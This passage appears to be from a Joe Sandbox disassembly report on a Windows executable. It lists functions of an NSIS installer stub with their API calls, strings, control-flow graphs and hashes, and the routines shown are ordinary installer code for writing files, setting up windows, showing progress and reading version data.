                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                          • API String ID: 2872004960-3619442763
                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                          Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                          APIs
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                          • API String ID: 608394941-1650083594
                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                          Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • lstrcatW.KERNEL32(00000000,00000000,135,004CB0B0,00000000,00000000), ref: 00401A76
                                          • CompareFileTime.KERNEL32(-00000014,?,135,135,00000000,00000000,135,004CB0B0,00000000,00000000), ref: 00401AA0
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                          • String ID: 135$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                          • API String ID: 4286501637-883799166
                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                          Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00403598
                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                          Strings
                                          • Inst, xrefs: 0040366C
                                          • Error launching installer, xrefs: 004035D7
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                          • Null, xrefs: 0040367E
                                          • soft, xrefs: 00403675
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 4283519449-527102705
                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                          Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004033E7
                                          • GetTickCount.KERNEL32 ref: 00403464
                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                          • wsprintfW.USER32 ref: 004034A4
                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CountFileTickWrite$wsprintf
                                          • String ID: ... %d%%$P1B$X1C$X1C
                                          • API String ID: 651206458-1535804072
                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                          Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                          APIs
                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                          • String ID:
                                          • API String ID: 2740478559-0
                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                          Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GlobalFree.KERNELBASE(00879208), ref: 00402387
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FreeGloballstrcpyn
                                          • String ID: 135$Exch: stack < %d elements$Pop: stack empty
                                          • API String ID: 1459762280-2550604189
                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                          Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • GlobalFree.KERNELBASE(00879208), ref: 00402387
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 3376005127-0
                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                          Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                          • String ID:
                                          • API String ID: 2568930968-0
                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                          Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                          Strings
                                          Memory Dump Source
